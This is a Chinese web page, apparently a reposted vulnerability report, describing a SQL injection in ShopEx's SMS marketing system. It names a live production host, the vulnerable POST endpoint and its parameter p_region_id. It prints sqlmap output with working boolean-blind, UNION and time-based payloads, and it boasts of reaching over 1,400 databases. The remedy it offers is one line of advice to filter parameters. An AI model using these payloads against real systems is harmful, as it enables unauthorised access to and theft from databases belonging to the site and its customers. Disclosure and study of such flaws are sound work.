好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

ShopEx短信通系统sql注入(POST) - 网站安全 - 自学

ShopEx无线营销系统,1400多个库

 

网站:

 

http://live.shopex.cn/

 

 

 

注入点

 

http://live.shopex.cn:80/index.php/passport/passport/sel_region (POST)

 

参数p_region_id

 

sqlmap identified the following injection points with a total of 80 HTTP(s) requests: --- Place: (custom) POST Parameter: #1* Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: p_region_id=' RLIKE IF(7814=7814,0x705f726567696f6e5f69643d2a,0x28) AND 'CNmq'='CNmq Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: p_region_id=' UNION ALL SELECT CONCAT(0x7174677a71,0x677754534a75516c5142,0x7176626271),NULL# Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: p_region_id=' AND 1203=BENCHMARK(5000000, MD5 (0x4f757a6a)) AND 'WAGO'='WAGO --- web application technology: Nginx, PHP 5.2.13 back-end DBMS: MySQL >= 5.0.0

 

 

用户:

 

 

1400多个库,也太多了吧:

 

 

修复方案:

参数过滤

查看更多关于ShopEx短信通系统sql注入(POST) - 网站安全 - 自学的详细内容...

  阅读:85次